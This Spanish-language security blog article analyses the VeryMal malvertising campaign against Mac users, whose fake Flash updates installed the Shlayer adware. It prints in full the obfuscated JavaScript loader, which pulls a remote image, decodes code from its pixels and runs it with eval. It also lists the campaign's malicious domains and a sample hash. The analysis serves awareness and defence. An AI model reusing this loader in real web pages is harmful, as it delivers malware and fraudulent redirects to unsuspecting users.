Usuarios de Mac lo están pasando VeryMal

Investigadores de Confiant descubrieron una campaña de malware notablemente masiva, ingeniosa y cuyo alto alcance apunta exclusivamente a usuarios de Macs. La forma de introducir el malware es a mediante esteganografía, muy adecuado para usuarios de Apple… La esteganografía es la práctica de ocultar mensajes, información, en algún otro medio que no esté oculto y […]

Investigadores de Confiant descubrieron una campaña de malware notablemente masiva, ingeniosa y cuyo alto alcance apunta exclusivamente a usuarios de Macs. La forma de introducir el malware es a mediante esteganografía, muy adecuado para usuarios de Apple…

La esteganografía es la práctica de ocultar mensajes, información, en algún otro medio que no esté oculto y que actúe como el portador del mensaje. Difiere de la criptografía en que esta última se encarga sólo de codificar los mensajes, mientras que la esteganografía se encarga, además, de introducir un trozo de información codificado al medio portador.

El caso de VeryMal, nombre que se le ha dado al grupo que distribuye este malware específico, es interesante y nos recuerda que, no importa qué tecnología utilicemos, siempre debemos estar cautelosos y conscientes de nuestro ciber entorno y lo que ocurre en él. Si bien este caso llama la atención, pues utiliza técnicas poco comunes, la razón por la cual los usuarios finalmente caen víctimas no es nada nuevo…

VeryMal y su forma de atacar

VeryMal fue nombrado de esa forma pues uno de los dominios que ocupan para entregar la publicidad es veryield-malyst.com y se estima que, al menos, cinco millones de visitantes estuvieron expuestos a esta amenaza. Los que no fueron cautos y cayeron en el engaño, se convirtieron en víctimas de esta campaña de distribución de malware.

Como les decíamos, en este caso parte del ataque comienza con la entrega de código malicioso a través de una imagen que no levanta ninguna sospecha:

La imagen que distribuye el comienzo del ataque es esta, aparentemente inofensiva, barrita blanca

Pero esta imagen contiene el siguiente código:

<canvas id='iak'></canvas>
<script >
    var wsw = "10512" ;var volton = "154c8e99-aad0-4658-b5fb-645c751ad42b";
    var canvas = document['getElementById']('iak');
    var ctx = canvas['getContext']('2d');
    var image = new Image();
    image['crossOrigin'] = '';
    image['src'] = 'http://s.ad-pixel.com/sscc.jpg';
    var rs = '';
    var isSupportFontFamily = function (c) {
        if (typeof c != 'string') {
            return ![];
        }
        var d = 'Arial';
        if (c['toLowerCase']() == d['toLowerCase']()) {
            return !![];
        }
        var e = 'a';
        var f = 0x64;
        var g = 0x64, h = 0x64;
        var i = document['createElement']('canvas');
        var j = i['getContext']('2d');
        i['width'] = g;
        i['height'] = h;
        j['textAlign'] = 'center';
        j['fillStyle'] = 'black';
        j['textBaseline'] = 'middle';
        var k = function (l) {
            j['clearRect'](0x0, 0x0, g, h);
            j['font'] = f + 'px\x20' + l + ',\x20' + d;
            j['fillText'](e, g / 0x2, h / 0x2);
            var m = j['getImageData'](0x0, 0x0, g, h)['data'];
            return []['slice']['call'](m)['filter'](function (n) {
                return n != 0x0;
            });
        };
        return k(d)['join']('') !== k(c)['join']('');
    };
    var riXs = document['getElementsByTagName']('body');
    var rrxT = riXs[0x0]['style']['cssText'];
    if (isSupportFontFamily('-apple-system') && rrxT != 'margin:\x200px;') {
        image['onload'] = function () {
            ctx['drawImage'](image, 0x0, 0x0);
            var o = ctx['getImageData'](0x0, 0x0, image['width'], image['height']);
            for (var p = 0x0, q = 0x0; q < 0x4b; p = p + 0x4, q++) {
                rs += String['fromCharCode'](o['data'][p + 0x2]);
            }
            eval(rs);
        };
    }
</script>

En castellano, este código dice:

• Crea un objeto, un Canvas. Lo que permite el uso de la API de Canvas en HTML5, que permite interactuar con las imágenes y sus datos subyacentes
• Agarrar la imagen localizada en hxxp://s.ad-pixel.com/sscc.jpg
• Definir una función que verifica si una familia de fuentes de texto específica es soportada por el navegador
• Verifica si ciertas fuentes de Apple son soportadas. Si no lo son, no hacer nada
• Si lo son, loopers a través de los datos subyacentes en el archivo de imagen. Cada loop lee un valor de pixel y lo traduce a un carácter alfanumérico
• Se añade el nuevo carácter extraído a una cadena
• Ejecutar el código en la cadena

Las imágenes utilizan formatos de archivos no ejecutables para almacenar datos comprimidos. Cuando un navegador o lector de archivos carga una imagen, descomprime el archivo y usa los datos para “pintar” la imagen, pixel por pixel.

Después de añadir cada carácter extraído desde la imagen, la cadena sería un trozo de código en JavaScript:

top.location.href =’hxxp://veryield-malyst.com/’ + volton + ‘?var1=’ + wsw;

Y con los parámetros populados,

hxxp://veryield-malyst.com/154c8e99-aad0–4658-b5fb-645c751ad42b?var1=10512

Con esto, VeryMal logra introducir el código necesario para redirigir a usuarios de Mac a un website que muestra publicidad que los engaña, diciéndoles que la versión de Flash Player está desactualizada. Quienes muerden el anzuelo, son infectados con Shlayer, un troyano para Mac que fue descubierto hace casi un año y cuya función es instalar adware.

El grupo VeryMal, o al menos ese dominio, ha estado activo por meses, pero la técnica de insertar el código inicial a través de esteganografía es nuevo. Anteriormente (noviembre de 2018) distribuían malware específico para Mac mediante un Javascript que buscaba al Webkit de Apple.

VeryMal utiliza redirecciones HTTP 302 de su dominio veryield-malyst.com a adpiano.com, una plataforma poco conocida con información de contacto en Chipre. Adpiano actúa como rastreador de clics para estas campañas y otros anuncios maliciosos que incluyen, entre otros:

– morningflashsee.club
– bestadbid.com
– newadvancetypeliteflash.services
– doconcretegreatliteflash.icu
– firstfetchflash.club
– windowinstalldealaflash.icu
– upgradebestfinishtheclicks.icu
– booe.pro
– freecalculation.com

Las redirecciones forzadas no son el único vector de ataque que VeryMal utiliza.  Se ha observado que ejecutan descaradamente anuncios gráficos para sus instaladores de malware bajo la apariencia de actualizaciones de Flash y software de reparación de PC. Las muestras creativas de la campaña de diciembre incluyen lo siguiente:

La campaña reciente de VeryMal aprovechó el siguiente click-tracker en su cadena de redirección para descargar el falso update de Flash:

hxxps://cs.adpiano.com/kokodzbambo/aaoaeeea/?utm_source=1236&utm_campaign=1616984&aff_sub=w3SGFK32C602JCMJHKLPR5FC&clck=w3SGFK32C602JCMJHKLPR5FC&sid=w3SGFK32C602JCMJHKLPR5FC

Las páginas de inicio para esta campaña rotan entre direcciones de dominio que finalizan en *.icu, como:

mixmaintenancegreatliteflash.icu

mediafreshgreatliteflash.icu

Todas las páginas a las que esta campaña dirige forzar la descarga de un archivo llamado AdobeFlashPlayerInstaller.iso. Detalles en VirusTotal. El análisis del archivo lo realizó Adam Thomas, investigador de amenazas e Intel de Malwarebytes.

Nombre de la muestra: AdobeFlashPlayerInstaller.iso
SHA-256: 75426777c469dbce816dc197b5bef518f4eca577e9c53e4679d81db2780a262f
Tipo de Archivo: Macintosh Disk Image
Firma Digital: 2J5Q8FU8C6 (Apple Team ID)

Shlayer, un típico adware para Mac

En vez del típico binario para Mac (Mach-o) contenido en el paquete de la aplicación, se encuentra un shellscript que decodifica un archivo encriptado con AES-256 y que se encuentra contenido en el directorio de recursos de la aplicación. Después de remover la encriptación, se halla un script legible, pero encriptado en base64. Posterior a decodificarlo, se obtiene una cadena en formato hex, que luego, el mismo script, convierte a ASCII, y finalmente revela otro script y la capa final del malware downloader, que descarga un archivo zip, protegido con contraseña, que finalmente, se ejecuta y hace de las suyas, enviando a los usuarios de Mac a través de un montón de dominios de publicidad.

Este ataque nos deja varias conclusiones. Primero que todo, este ataque estuvo activo entre el 11 y 13 de enero de 2019, y en ese corto espacio de tiempo estuvo expuesto a 5 millones de usuarios por día! Durante el peak del 11 de enero se estima que la pérdida que este ataque provocó se puede monetizar en más de US $1.2 millones, que golpean a la industria de la publicidad en línea, además de dejar a los usuarios con sus computadores infectados.

También nos llama a estar alerta. Es un ataque que emplea un método más elaborado para distribuirse y que ataca a un grupo específico de usuarios, pero finalmente, requiere que realicemos una acción que no deberíamos, mediante un poquito de Ingeniería Social, y que es ya un clásico: aceptar la instalación de un update de Flash.

Sin importar qué sistema operativo utilicemos, debemos ser conscientes de que, de todas formas, intentan introducir cosas a nuestros computadores que nos llevan cosas que no deseamos. Como un montón de publicidad, forzada a nosotros, que nunca quisimos ver.